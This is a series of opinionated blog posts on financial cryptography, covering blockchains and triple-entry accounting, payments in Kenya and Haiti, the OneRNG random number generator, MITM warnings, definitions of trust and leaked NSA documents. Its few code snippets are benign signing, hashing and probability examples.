We're in an environment with extremely scarce information about what will or will not succeed and even the people with the best information in the world are still just guessing. The whole thing is just guesswork.

History of Blockchains in a Nutshell, and I will bring all this back together in time.

In the 1970s the SQL database was basically a software system that was designed to make it possible to do computation using tape storage. You know how in databases, you have these fixed field lengths, 80 characters 40 characters, all this stuff, it was so that when you fast-forwarded the tape, you knew that each field would take 31 inches and you could fast forward by 41 and a half feet to get to the record you needed next. The entire thing was about tape.

In the 1990s, we invent the computer network, at this point we're running everything across telephone wires, basically this is all pre-Ethernet. It's really really early stuff and then you get Ethernet and standardisation and DNS and the web, the second generation of technology.

The bridges between these systems never worked. Anybody that's tried to connect two corporations across a database knows that it's just an absolute nightmare. You get hacks like XML-EDI or JSON or SOAP or anything like that but you always discover that the two databases have different models of reality and when you interconnect them together in the middle you wind up having to write a third piece of software.

The N-squared problem. So the other problem is that if we've got 50 companies that want to talk to 50 companies you wind up having to write 50-squared interconnectors which results in an unaffordable economic cost of connecting all of these systems together. So you wind up with a hub and spoke architecture where one company acts as the broker, everybody writes a connector to that company, and then that company sells all of you down the river because it has absolute power.

As a result, computers have had very little impact on the structure of business even though they've brought the cost of communication and the cost of knowledge acquisition down to a nickel.

This is where we get back to Coase. The revolution that Coase predicted that computers should bring to business hasn't yet happened, and my thesis is that blockchains are what it takes to get that to run.


Editor again: That was Vinay's first 5 minutes, after which he took it across to blockchains. Meanwhile, I'll fork back a little to triple entry.

Recall the triple entry concept as being an extension of double entry: The 700 year old invention of double entry used two recordings as a redundant check to eliminate errors and surface fraud. This allowed the processing of accounting to be so reliable that employed accountants could do it. But accounting's double entries were never accepted outside the company, because as Gupta puts it, companies had "different models of reality."

Triple entry flips it all upside down by having one record come from an independent center, and then that record is distributed back to the two companies of any trade, making for 3 copies. Because we used digital signatures to fix one record, triply recorded, triple entry collapses the double vision of classical accounting's worldview into one reality.
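In data terms, a triple-entry record can be as small as one signed receipt held identically by both parties. A sketch (PyNaCl for the signature; the fields are mine for illustration, not Ricardo's):

    import json
    from nacl.signing import SigningKey

    issuer = SigningKey.generate()              # the independent centre

    entry = json.dumps({"payer": "Alice Ltd", "payee": "Bob plc",
                        "amount": "1000.00", "unit": "GBP", "ref": "invoice 42"},
                       sort_keys=True).encode()

    receipt = bytes(issuer.sign(entry))         # the single authoritative record
    alice_copy = bob_copy = receipt             # both parties hold the same bytes
    issuer.verify_key.verify(alice_copy)        # either side can prove what both saw

There is no "my ledger versus your ledger" left to reconcile - the receipt is the entry.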

We built triple entry in the 1990s, and ran it successfully, but it may have been an innovation too far. It may well be that what we were lacking was that critical piece: to overcome the trust factor we needed the blockchain.

On that note, here's another minute of the talk I copied before I realised my task was done!


The blockchain, regardless of all the complicated stuff you've heard about it, is simply a database that works just like the network. A computer network is everywhere and nowhere, nobody really owns it, and everybody cooperates to make it work, all of the nodes participate in the process, and they make the entire thing efficient.

Blockchains are simply databases updated to work on the network. And those databases are ones with different properties than the databases made to run on tape. They're decentralised, you can't edit anything, you can't delete anything, the history is stored perfectly, if you want to make an update you just republish a new version of it, and to ensure the thing has appropriate accountability you use digital signatures.

It's not nearly as complicated as the tech guys in blockchainland will tell you. Yes it's as complicated as the inside of an SQL database. All of your companies run SQL databases, none of you really know how they work, it's going to be just like that with blockchains. Two years you'll forget the word blockchain, you'll just hear database, and it'll mean the same thing. Probably.

Posted by iang at 08:07 AM | Comments (0)

February 03, 2015

News that's news: Kenya's M-Kopa Solar Closes $12.45m

If there's any news worth blogging about, it is this:

Breaking: Kenya's M-Kopa Solar Closes $12.45 million Fourth Funding Round

M-KOPA Solar has today closed its fourth round of investment through a $12.45 million equity and debt deal, led by LGT Venture Philanthropy. The investment will be used to expand the company's product range, grow its operating base in East Africa and license its technology to other markets.

Lead investor LGT Venture Philanthropy has backed M-KOPA since 2011 and is making its biggest investment yet in the fourth round, which also includes reinvestments from Lundin Foundation and Treehouse Investments (advised by Imprint Capital) and a new investment from Blue Haven Initiative.

In less than two and a half years since launch, M-KOPA Solar has installed over 150,000 residential solar systems in Kenya, Uganda and Tanzania, and is now connecting over 500 new homes each day. The company plans to further expand its distribution and introduce new products to reach an even larger customer base.

Jesse Moore, Managing Director and Co-Founder M-KOPA Solar says, "Our investors see innovation and scale in what M-KOPA does. And we see a massive unmet market opportunity to provide millions of off-grid households with affordable, renewable energy. We are just getting started in terms of the scale and impact of what we will achieve."

Oliver Karius, Partner, LGT Venture Philanthropy says, "We believe that we are at the dawn of a multi-billion dollar 'pay-as-you-go' energy industry. LGT Venture Philanthropy is a long-term investor in M-KOPA Solar because they've proven to be the market leaders, both in terms of innovating and delivering scale. We have also seen first-hand what positive impacts their products have on customers' lives - making low-income households wealthier and healthier."

This deal follows the successful $20 million (KES1.8 billion) third round funding closed in December 2013 - which featured a working capital debt facility, led by the Commercial Bank of Africa.

The reason this is real news in the "new" sense is that indigenous solutions can work because they are tailored to the actual events and activities on the ground. In contrast, the western aid / poverty agenda typically doesn't work and does more harm than good, because it is an export of western models to countries that aren't aligned to those assumptions. Message to the west: Go away, we've got this ourselves.

Posted by iang at 08:18 AM | Comments (1)

January 20, 2015

Hitler v. modern western state of the art transit payment systems: Hitler 1, rich white boys 0.

As predicted on the first day we saw it (and published on this blog much later), mass transit payment systems are failing in Kenya:

Payment cards rolling back gains in Kenya's public transport sector

by Bedah Mengo NAIROBI (Xinhua) -- "Cash payment only", reads a sticker in a matatu plying the city center-Lavington route in Nairobi, Kenya. The vehicle belonging to a popular company was among the first to implement the cashless fare payment system that the Kenya government is rooting for.

And as it left the city center to the suburb on Monday, some passengers were ready to pay their fares using payment cards. However, the conductor announced that he would not accept cashless payments.

"Please pay in cash," he said. "We have stopped using the cashless system."

When one of the passengers complained, the conductor retorted as he pointed at the sticker pasted on the wall of the minibus. "This is not my vehicle, I only follow orders."

All passengers paid their fares in cash as those who had payment cards complained of having wasted money on the gadgets. The experience in the vehicle displays the fate of the cashless fare payment in the East African nation. The system is fast-fading from the country's transport barely a month after the government made frantic efforts to entrench it. ...

It's probably too late for them now, but I think there are ways to put such a system out through Kenya's mass transit. You just don't do it that way because the market will not accept it. Rejection was totally obvious, and not only because asymmetric payment mechanisms don't succeed if both sides have a choice:

The experience in the vehicle displays the fate of the cashless fare payment in the East African nation. The system is fast-fading from the country's transport barely a month after the government made frantic efforts to entrench it.

The Kenya government imposed a December 1, 2014 deadline as the time when all the vehicles in the nation should be using payment cards. A good number of matatu operators installed the system as banks and mobile phone companies launched cards to cash in on the fortune.

Commuters, on the other hand, bought the cards to avoid being inconvenienced. However, the little gains that were made in that period are eroding as matatu operators who had embraced the system go back to the cash.

"We were stopped from using the cashless system, because the management found it cumbersome. They said they were having cash-flow problems due to the bureaucracies involved in getting payments from the bank. None of our fleet now uses the system," explained the conductor.

A spot check on various routes in the city indicated that there are virtually no vehicles using the cashless system.

"When it failed to take off on December 1 last year, many vehicles that had installed the system abandoned it. They have the gadgets, but they are not using them," said Manuel Mogaka, a matatu operator on the Umoja route.

As I pointed out, the root issue they missed here was the incentives of, well, just about everyone on the bus!

If someone is serious about this, I can help, but I take the real cash, not fantasy plastic. I spent some time working the real issues in Kenya, and they have more latent potential waiting to be tapped than just about any country on the planet. Our designs were good, but that's because they were based on helping people with problems they wanted solved and were willing to work to solve.

The ditching of the payment cards means that the Kenya government has a herculean task in implementing the system.

"It is not only us who are uncomfortable with the system, even passengers. Mid December last year, some passengers disembarked from my vehicle when I insisted I was only taking cashless fare. I had to accept cash because passengers were not boarding," said Mogaka.

Not handwavy bureaucratic agendas like "stamp out corruption." Yes, you! Read this on corruption and not this:

Kenya's Cabinet Secretary for Transport and Infrastructure Joseph Kamau said despite the challenges, the system will be implemented fully. He noted that the government will only renew licences of the vehicles that have installed the system.

But matatu operators have faulted the directive, noting that it would be pointless to have the system when commuters do not have payment cards.

"Those cards can only work with people who have regular income and are able to budget a certain amount of money for fare every month. But if your income is irregular and low, it cannot work," said George Ogundi, casual laborer who stays in Kayole on the east of Nairobi.

Analysts note that the rush in implementing the system has made Kenya's public transport sector a "graveyard" where the cashless payment will be buried.

"The government should have first started with revamping the sector by coming up with a well-organized metropolitan buses like those found in developed world. People would have seen their benefits and embraced cashless fare payment," said Bernard Mwaso of Edell IT Solutions in Nairobi.

(Obviously, if the matatu owners don't install, government resistance will last about a day after the deadline.)

Posted by iang at 08:08 AM | Comments (0)

December 21, 2014

OneRNG -- open source design for your random numbers

Paul of Moonbase has put a plea onto Kickstarter to fund a run of open RNGs. As we all know, having good random numbers is one of those devilishly tricky open problems in crypto. I'd encourage one and all to click and contribute.

For what it's worth, in my opinion, the issue of random numbers will remain devilish & perplexing until we seed hundreds of open designs across the universe and every hardware toy worth its salt also comes with its own open RNG, if only for the sheer embarrassment of not having done so before.

OneRNG is therefore massively welcome:

About this project

After Edward Snowden's recent revelations about how compromised our internet security has become some people have worried about whether the hardware we're using is compromised - is it? We honestly don't know, but like a lot of people we're worried about our privacy and security.

What we do know is that the NSA has corrupted some of the random number generators in the OpenSSL software we all use to access the internet, and has paid some large crypto vendors millions of dollars to make their software less secure. Some people say that they also intercept hardware during shipping to install spyware.

We believe it's time we took back ownership of the hardware we use day to day. This project is one small attempt to do that - OneRNG is an entropy generator, it makes long strings of random bits from two independent noise sources that can be used to seed your operating system's random number generator. This information is then used to create the secret keys you use when you access web sites, or use cryptography systems like SSH and PGP.

Openness is important, we're open sourcing our hardware design and our firmware, our board is even designed with a removable RF noise shield (a 'tin foil hat') so that you can check to make sure that the circuits that are inside are exactly the same as the circuits we build and sell. In order to make sure that our boards cannot be compromised during shipping we make sure that the internal firmware load is signed and cannot be spoofed.
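On Linux, "seed your operating system's random number generator" can be as simple as copying bytes from the device into /dev/random, which mixes them into the kernel pool (crediting entropy properly needs an ioctl and root, which a daemon like rngd normally handles; the device path below is a guess, not OneRNG documentation):

    DEVICE = "/dev/ttyACM0"      # hypothetical path where the board might enumerate

    with open(DEVICE, "rb") as rng, open("/dev/random", "wb") as pool:
        pool.write(rng.read(4096))   # mixed into the pool; no entropy is credited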

OneRNG has already blasted through its ask of $10k. It's definitely still worth contributing more, because it ensures a bigger run and draws much more attention to this project. As well, we signal to the world:

*we need good random numbers*

and we'll fight aka contribute to get them.

Posted by iang at 12:59 PM | Comments (2)

December 04, 2014

MITM watch - sitting in an English pub, get MITM'd

So, sitting in a pub idling till my 5pm, I thought I'd do a quick check on my mail. Someone likes my post on yesterday's rare evidence of MITMs, posts a comment. Nice, I read all comments carefully to strip the spam, so, click click...

Boom, Firefox takes me through the wrestling trick known as MITM procedure. Once I've signalled my passivity to its immoral arrest of my innocent browsing down mainstreet, I'm staring at the charge sheet.

Whoops -- that's not financialcryptography.com's cert. I'm being MITM'd. For real!

Fully expecting an expiry or lost exception or etc, I'm shocked! I'm being MITM'd by the wireless here in the pub. Quick check on twitter.com who of course simply have to secure all the full tweetery against all enemies foreign and domestic and, same result. Tweets are being spied upon. The horror, the horror.

On reflection, the positive result worked. One reason for that on the skeptical side is that, as I'm one of the 0.000001% of the planet that has wasted significant years on the business of protecting the planet against the MITM, otherwise known as the secure browsing model (cue acronyms like CA, PKI, SSL here...), I know exactly what's going on.

How do I judge it all? I'm annoyed, disturbed, but still skeptical as to just how useful this system is. We always knew that the warning would fire, that's how Mozilla designed their GUI -- overdoing their approach. As I intimated yesterday, the real problem is whether it works in the presence of a flood of false positives -- claimed attacks that aren't really attacks, just normal errors where you should carry on.

Secondly, to ask: Why is a commercial process in a pub of all places taking the brazen step of MITMing innocent customers? My guess is that users don't care, don't notice, or their platforms are hiding the MITM from them. One assumes the pub knows why: the "free" service they are using is just raping their customers with a bit of secret datamining to sell and pillage.

Well, just another data point in the war against the users' security.

Posted by iang at 09:49 AM | Comments (2)

December 03, 2014

MITM watch - patching binaries at Tor exit nodes

The real MITMs are so rare that protocols that are designed around them fall to the Bayesian impossibility syndrome (*). In short, frequent false positives cause the system to be ignored, and when a real attack indicator finally turns up, it is treated as just another false alarm. Ignored. Fail.

Here's some evidence of that with Tor:

... I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates. The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0x80200053.

.... If you Google the error code, the official Microsoft response is troublesome.

If you follow the three steps from the official MS answer, two of those steps result in downloading and executing a MS 'Fixit' solution executable. ... If an adversary is currently patching binaries as you download them, these 'Fixit' executables will also be patched. Since the user, not the automatic update process, is initiating these downloads, these files are not automatically verified before execution as with Windows Update. In addition, these files need administrative privileges to execute, and they will execute the payload that was patched into the binary during download with those elevated privileges.
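
The weakness the researcher is pointing at is that these manually downloaded 'Fixit' binaries are never independently checked. A minimal sketch of the kind of out-of-band check that would help, assuming the publisher's SHA-256 digest can be obtained over a separate, trusted channel (the file name and digest below are hypothetical):

    # Sketch: refuse to run a downloaded binary unless it matches a digest
    # obtained out-of-band. The file name and expected digest are hypothetical.
    import hashlib

    EXPECTED_SHA256 = "0123456789abcdef" * 4   # placeholder for the publisher's digest

    def sha256_of(path):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    def safe_to_run(path):
        # Only run the download if it matches the digest published out-of-band.
        return sha256_of(path) == EXPECTED_SHA256

    # safe_to_run("Fixit.exe")  -> False if the binary was patched in transit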

And, tomorrow, another MITM!

(*) I'd love to hear a better name than Bayesian impossibility syndrome, which I just made up. It's pretty important: it explains why the current SSL/PKI/CA MITM protection can never work, relying on Bayesian statistics to show why infrequent real attacks cannot be defended against when overshadowed by frequent false alarms.
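
To put a number on why that matters, here's a minimal sketch with purely illustrative figures -- assumptions, not measurements -- showing how a rare real attack drowns in routine false alarms:

    # Base-rate sketch for the "Bayesian impossibility syndrome".
    # All numbers are illustrative assumptions, not measurements.
    p_attack = 1e-6          # prior: fraction of connections that are real MITMs
    p_warn_if_attack = 0.99  # the warning fires on a real attack
    p_warn_if_benign = 0.01  # false alarm rate on benign errors (expiries, misconfigurations)

    # Bayes' rule: P(real attack | warning)
    p_warning = p_warn_if_attack * p_attack + p_warn_if_benign * (1 - p_attack)
    p_attack_given_warning = p_warn_if_attack * p_attack / p_warning

    print(f"P(real attack | warning) = {p_attack_given_warning:.6f}")
    # roughly 0.0001: about 1 warning in 10,000 is real, so users learn to click through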

Posted by iang at 09:40 AM | Comments (0)

October 12, 2014

In the Shadow of Central Banking

A recent IMF report on shadow banking places it in excess of $70 trillion.

"Shadow banking can play a beneficial role as a complement to traditional banking by expanding access to credit or by supporting market liquidity, maturity transformation and risk sharing," the IMF said in the report. "It often, however, comes with bank-like risks, as seen during the 2007-08 global financial crisis."

It's a concern, say the bankers; it keeps the likes of Jamie Dimon up at night. But, what is it? What is this thing called shadow banking? For that, the IMF report has a nice graphic:

Aha! It's the new stuff: securitization, hedge funds, Chinese 'wealth management products' etc. So what we have here is a genie that is out of the bottle. As described at length, the invention of securitization allows a shift from banking to markets which is unstoppable.

In theoretical essence, markets are more efficient than middlemen, although you'd be hard pressed to call either the markets or banking 'efficient' from recent history.

Either way, this genie is laughing and dancing. The finance industry had its three wishes, and now we're paying the cost.

Posted by iang at 09:18 AM | Comments (1)

July 23, 2014

on trust, Trust, trusted, trustworthy and other words of power

What follows is the clearest exposition of the doublethink surrounding the word 'trust' that I've seen so far. This post by Jerry Leichter on the Crypto list doesn't actually solve the definitional issue, but it does map out the minefield nicely. Trustworthy?

On Jul 20, 2014, at 1:16 PM, Miles Fidelman <...> wrote:
>> On 19/07/2014 20:26 pm, Dave Horsfall wrote:
>>>
>>> A trustworthy system is one that you *can* trust;
>>> a trusted system is one that you *have* to trust.
>>
> Well, if we change the words a little, the government
> world has always made the distinction between:
> - certification (tested), and,
> - accreditation (formally approved)

The words really are the problem. While "trustworthy" is pretty unambiguous, "trusted" is widely used to mean two different things: We've placed trust in it in the past (and continue to do so), for whatever reasons; or as a synonym for trustworthy. The ambiguity is present even in English, and grows from the inherent difficulty of knowing whether trust is properly placed: "He's a trusted friend" (i.e., he's trustworthy); "I was devastated when my trusted friend cheated me" (I guess he was never trustworthy to begin with).

In security lingo, we use "trusted system" as a noun phrase - one that was unlikely to arise in earlier discourse - with the *meaning* that the system is trustworthy.

Bruce Schneier has quoted a definition from some contact in the spook world: A trusted system (or, presumably, person) is one that can break your security. What's interesting about this definition is that it's like an operational definition in physics: It completely removes elements about belief and certification and motivation and focuses solely on capability. This is an essential aspect that we don't usually capture.

When normal English words fail to capture technical distinctions adequately, the typical response is to develop a technical vocabulary that *does* capture the distinctions. Sometimes the technical vocabulary simply re-purposes common existing English words; sometimes it either makes up its own words, or uses obscure real words - or perhaps words from a different language. The former leads to no end of problems for those who are not in the field - consider "work" or "energy" in physics. The latter causes those not in the field to believe those in it are being deliberately obscurantist. But for those actually in the field, once consensus is reached, either approach works fine.

The security field is one where precise definitions are *essential*. Often, the hardest part in developing some particular secure property is pinning down precisely what the property *is*! We haven't done that for the notions surrounding "trust", where, to summarize, we have at least three:

1. A property of a sub-system a containing system assumes as part of its design process ("trusted");
2. A property the sub-system *actually provides* ("trustworthy").
3. A property of a sub-system which, if not attained, causes actual security problems in the containing system (spook definition of "trusted").

As far as I can see, none of these imply any of the others. The distinction between 1 and 3 roughly parallels a distinction in software engineering between problems in the way code is written, and problems that can actually cause externally visible failures. BTW, the software engineering community hasn't quite settled on distinct technical words for these either - bugs versus faults versus errors versus latent faults versus whatever. To this day, careful papers will define these terms up front, since everyone uses them differently.

-- Jerry

Posted by iang at 05:05 AM | Comments (1) | TrackBack

June 20, 2014

Signalling and MayDay PAC

There's a fascinating signalling opportunity going on in US politics. As we all know, 99% of the seats in the US Congress are paid for by contributions from corporate funders, through a mechanism called PACs, or political action committees. Typically, the well-funded campaigns win the seats, and for that you need a big fat PAC with powerful corporate wallets behind it.

Lawrence Lessig decided to do something about it.

"Yes, we want to spend big money to end the influence of big money... Ironic, I get it. But embrace the irony."

So, fighting fire with fire, he started the Mayday PAC:

"We’ve structured this as a series of matched-contingent goals. We’ve got to raise $1 million in 30 days; if we do, we’ll get that $1 million matched. Then we’ve got to raise $5 million in 30 days; if we do, we’ll get that $5 million matched as well. If both challenges are successful, then we’ll have the money we need to compete in 5 races in 2014. Based on those results, we’ll launch a (much much) bigger effort in 2016 — big enough to win."

They got to their first target; the second, of $5m, will close on 30th June. Larry claims to have been inspired by Aaron Swartz:

“How are you ever going to address those problems so long as there’s this fundamental corruption in the way our government works?” Swartz had asked.

Something much at the core of the work I do in Africa.

The signalling opportunity is the ability to influence total PAC spending by claiming to balance it out. If MayDay PAC states something simple such as "we will outspend the biggest spend in USA congress today," then how do the backers for the #1 financed-candidate respond to the signal?

As the backers know that their money will be balanced out, it will no longer be efficacious to buy their decisions *with the #1 candidate*. They'll go elsewhere with their money, because to back their big man means to also attract the MayDay PAC.

Which will then leave the #2 paid seat in Congress at risk ... who will also commensurately lose funds. And so on ... A knock-on effect could rip the funding rug from many top campaigns, leveraging Lessig's measly $12m way beyond its apparent power.

A fascinating experiment.

The challenge of capturing people’s attention isn’t lost on Lessig. When asked if anyone has told him that his idea is ludicrous and unlikely to work, he answers with a smile: “Yeah, like everybody.”

Sorry, not this anybody. This will work. Economically speaking, signalling does work. Go Larry!

Posted by iang at 01:34 AM | Comments (0) | TrackBack

May 07, 2014

A triple-entry explanation for a minimum viable Blockchain

It's an article of faith that accounting is at the core of cryptocurrencies. Here's a nice story along those lines h/t to Graeme:

Ilya Grigorik provides a ground-up technologist's description of Bitcoin called "The Minimum Viable Blockchain." He starts at bartering, goes through triple-entry and the replacement of the intermediary with the blockchain, and then goes on to explain how all the perverse features strengthen the blockchain. It's interesting to see how others see the nexus between triple-entry and Bitcoin, and I think it is going to be one of future historians' puzzles to figure out how it all relates.

Both Bob and Alice have known each other for a while, but to ensure that both live up to their promise (well, mostly Alice), they agree to get their transaction "notarized" by their friend Chuck.

They make three copies (one for each party) of the above transaction receipt indicating that Bob gave Alice a "Red stamp". Both Bob and Alice can use their receipts to keep account of their trade(s), and Chuck stores his copy as evidence of the transaction. Simple setup but also one with a number of great properties:

  1. Chuck can authenticate both Alice and Bob to ensure that a malicious party is not attempting to fake a transaction without their knowledge.
  2. The presence of the receipt in Chuck's books is proof of the transaction. If Alice claims the transaction never took place then Bob can go to Chuck and ask for his receipt to disprove Alice's claim.
  3. The absence of the receipt in Chuck's books is proof that the transaction never took place. Neither Alice nor Bob can fake a transaction. They may be able to fake their copy of the receipt and claim that the other party is lying, but once again, they can go to Chuck and check his books.
  4. Neither Alice nor Bob can tamper with an existing transaction. If either of them does, they can go to Chuck and verify their copies against the one stored in his books.

What we have above is an implementation of "triple-entry bookkeeping", which is simple to implement and offers good protection for both participants. Except, of course you've already spotted the weakness, right? We've placed a lot of trust in an intermediary. If Chuck decides to collude with either party, then the entire system falls apart.

Grigorik then uses public key cryptography to ensure that the receipt becomes evidence that is reliable for all parties, which is how I built it, and I'm pretty sure that is what was intended by Todd Boyle.
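
To make that concrete, here's a minimal sketch (my own illustration, not Grigorik's code) of a receipt that carries its own evidence: the issuer signs the receipt body, and any holder can verify it later without trusting the other parties' books. The Ed25519 keys and field names are assumptions for the example:

    # Sketch: a signed receipt as portable evidence of a transaction.
    # Keys and field names are illustrative; this is not Grigorik's code.
    import json
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
    from cryptography.exceptions import InvalidSignature

    chuck_key = Ed25519PrivateKey.generate()        # the 'notary' of the story

    receipt = {"from": "Bob", "to": "Alice", "what": "Red stamp", "seq": 1}
    body = json.dumps(receipt, sort_keys=True).encode()
    signature = chuck_key.sign(body)

    def verify(body, signature, pubkey):
        try:
            pubkey.verify(signature, body)          # raises InvalidSignature if forged or altered
            return True
        except InvalidSignature:
            return False

    print(verify(body, signature, chuck_key.public_key()))        # True: the receipt stands on its own
    print(verify(body.replace(b"Alice", b"Eve"), signature,
                 chuck_key.public_key()))                          # False: tampering is evident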

However, he walks a different path and uses the signed receipts as a way to drop the intermediary and have Alice and Bob keep separate, independent ledgers. I'd say this is more a means to an end, as Grigorik is trying to explain Bitcoin, and the central tenet of that cryptocurrency was the famous elimination of a centralised intermediary.

Moral of the story? Be (very) careful about your choice of the intermediary!

I don't have time right now to get into the rest of the article, but so far it does seem like a very good engineer's description. Well worth a read to sort your head out when it comes to all the 'extra' bits in the blockchain form of cryptocurrencies.

Posted by iang at 03:09 AM | Comments (0) | TrackBack

April 18, 2014

Shots over the bow -- Haiti joins with USA to open up payments for the people

The separation of payments from banks is accelerating. News from Haiti:

The past year in Haiti has been marked by the slow pace of the earthquake recovery. But the poorest nation in the hemisphere is moving quickly on something else - setting up "mobile money" networks to allow cell phones to serve as debit cards.

The systems have the potential to allow Haitians to receive remittances from abroad, send cash to relatives across town or across the country, buy groceries and even pay for a bus ride all with a few taps of their cell phones.

Using phones to handle money payments is something we know works. It works so well that some 35% of the economy in Kenya moves this way (I forget the exact numbers). It works so well that Kenya doesn't care about the banks freezing up the economy any more, because it has an alternative system; it has resilience in payments. It works so well that everyone can use mPesa, even the unbanked -- which is most of them, since bank accounts cost as much in Kenya as in the west.

It works so well that mPesa has been the biggest driver of new bank accounts...

Yet mPesa hasn't been followed around the world. The reason is pretty simple -- regulatory interference. Central banks, I'm looking at you. In Kenya, the mission of "financial inclusion" won the day; in other countries around the world, central banks worked against wealth for the poorest by denying them payments on the mobile.

Is it that drastic? Yes. Were the central banks well-minded? Sure, they thought they were doing the right thing, but they were wrong. Mobile money equals wealth for the poor and there is no way around that fact. Stopping mobile money means taking money from the poor, in the big picture. Everything else is noise.

So when the poorest of the poor -- the Haitian earthquake victims -- were left in the mud, there were no banks left to serve them (sell to them?), and the only way to get value out there turned out to be the mobile phone.

That included giving the users free mobile phones.

Can you see an important value point here? The value to society of getting mobile money to the poor is in excess of the price of the mobile phone.

Well, this only happens in poor countries, right? Wrong again. The financial costs that the decisions of the central banks place on the poor are common across all countries. Now comes Walmart, for that very same reason:

In a move that threatens to upend another piece of the financial services industry, Walmart, the country’s largest retailer, announced on Thursday that it would allow customers to make store-to-store money transfers within the United States at cut-rate fees.

This latest offer, aimed largely at lower-income shoppers who often rely on places like check-cashing stores for simple transactions, represents another effort by the giant retailer to carve out a space in territory that once belonged exclusively to traditional banks.
...
Lower-income consumers have been a core demographic for Walmart, but in recent quarters those shoppers have turned increasingly to dollar stores.
...
More than 29 percent of households in the United States did not have a savings account in 2011, and about 10 percent of households did not have a checking account, according to a study sponsored by the Federal Deposit Insurance Corporation. And while alternative financial products give consumers access to services they might otherwise be denied, people who are shut out of the traditional banking system sometimes find themselves paying high fees for transactions as basic as cashing a check.

See the common thread with Bitcoin? Message to central banks: shut the people out, and they will eventually respond. The tide is now turning, and banks and central banks no longer have the credibility they once had to stomp on the poor. The question for the future is, which central banks will break ranks first, and align themselves with their countries and their peoples?

Posted by iang at 06:07 AM | Comments (0) | TrackBack

February 09, 2014

Digital Evidence journal is now open source!

Stephen Mason, the world's foremost expert on the topic, writes (edited for style):

The entire Digital Evidence and Electronic Signature Law Review is now available as open source for free here:

Current Issue         Archives

All of the articles are also available via university library electronic subscription services which require accounts:

EBSCO Host         HeinOnline         v|lex (has abstracts)

If you know of anybody that might have the knowledge to consider submitting an article to the journal, please feel free to let them know of the journal.

This is significant news for the professional financial cryptographer! For those who are interested in what all this means, this is the real stuff. Let me explain.

Back in the 1980s and 1990s, there was a little thing called the electronic signature, and its RSA cousin, the digital signature. Businesses, politicians, spooks and suppliers dreamed that they could inspire a world-wide culture of digitally signing your everything with a hand wave, with the added joy of non-repudiation.

They failed, and we thank our lucky stars for it. People do not want to sign away their life every time some little plastic card gets too close to a scammer, and thankfully humanity had the good sense to reject the massively complicated infrastructure that was built to enslave them.

However, a suitably huge legacy of that folly was the legislation around the world to regulate the use of electronic signatures -- something that Stephen Mason has catalogued here.

In contrast to the nuisance level of electronic signatures, a separate and far more significant development transpired in parallel. This was the increasing use of digital techniques to create trails of activity, which led to the rise of digital evidence, and its eventual domination in legal affairs.

Digital discovery is now the main act, and the implications have been huge, if little appreciated outside legal circles, perhaps because of the persistent myth in technology circles that without digital signatures, evidence was worth less.

Every financial cryptographer needs to understand the implications of digital evidence, because without this wisdom, your designs are likely crap. They will fail when faced with real-world trials, in both senses of the word.

I can't write the short primer on digital evidence for you -- I'm not the world's expert, Stephen is! -- but I can /now/ point you to where to read. That's just one huge issue, hitherto locked away behind a hugely dominating paywall. Browse away at all 10 issues!

Posted by iang at 02:47 AM | Comments (0) | TrackBack

November 10, 2013

The NSA will shape the worldwide commercial cryptography market to make it more tractable to...

In the long running saga of the Snowden revelations, another fact is confirmed by ashkan soltani. It's the last point on this slide showing some nice redaction minimisation.

In words:

(U) The CCP expects this Project to accomplish the following in FY 2013:
  • ...
  • (TS//SI//NF) Shape the worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS. [CCP_00090]

Confirmed: the NSA manipulates the commercial providers of cryptography to make it easier to crack their product. When I said, avoid American-influenced cryptography, I wasn't joking: the Consolidated Cryptologic Program (CCP) is consolidating access to your crypto.

Addition: John Young forwarded me the original documents (Guardian and NYT) and their blanket introduction makes it entirely clear:

(TS//SI//NF) The SIGINT Enabling Project actively engages the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products' designs. These design changes make the systems in question exploitable through SIGINT collection (e.g., Endpoint, MidPoint, etc.) with foreknowledge of the modification. ....

Note also that the classification for the goal above differs in that it is NF -- No Foreigners -- whereas most of the other goals listed are REL TO USA, FVEY which means the goals can be shared with the Five Eyes Intelligence Community (USA, UK, Canada, Australia, New Zealand).

The more secret it is, the more clearly important is this goal. The only other goal with this level of secrecy was the one suggesting an actual target of sensitivity -- fair enough. More confirmation:

(U) Base resources in this project are used to:
  • (TS//SI//REL TO USA, FVEY) Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.
  • ...

and in goals 4, 5:

  • (TS//SI//REL TO USA, FVEY) Complete enabling for [XXXXXX] encryption chips used in Virtual Private Network and Web encryption devices. [CCP_00009].
  • (TS//SI//REL TO USA, FVEY) Make gains in enabling decryption and Computer Network Exploitation (CNE) access to fourth generation/Long Term Evolution (4GL/LTE) networks via enabling. [CCP_00009]

Obviously, we're interested in the [XXXXXX] above. But the big picture is complete: the NSA wants backdoor access to every chip used for encryption in VPNs, wireless routers and the cell network.

This is no small thing. There should be no doubt now that the NSA actively looks to seek backdoors in any interesting cryptographic tool. Therefore, the NSA is numbered amongst the threats, and so are your cryptographic providers, if they are within reach of the NSA.

Granted that other countries might behave the same way. But the NSA has the resources, the will, the market domination (consider Microsoft's CAPI, Java's Cryptography Engine, Cisco & Juniper on routing, FIPS effect on SSL, etc) and now the track record to make this a more serious threat.

Posted by iang at 06:48 AM | Comments (0) | TrackBack

November 01, 2013

NSA v. the geeks v. google -- a picture is worth a thousand cribs

Dave Cohen says: "I wonder if I have what it takes to make presentations at the NSA."

H/t to Jeroen. So I wonder if the Second World Cryptowars are really on?

Our Mission

To bring the world our unique end-to-end encrypted protocol and architecture that is the 'next-generation' of private and secure email. As founding partners of The Dark Mail Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the worlds first end-to-end encrypted 'Email 3.0' throughout the world's email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

Could be. In the context of the new google sniffing revelations, it may now be clearer how the NSA is accessing all of the data of all of the majors. What do we think about the NSA? Some aren't happy, like Kenton Varda:

If the NSA is indeed tapping communications from Google's inter-datacenter links then they are almost certainly using the open source protobuf release (i.e. my code) to help interpret the data (since it's almost all in protobuf format). Fuck you, NSA.

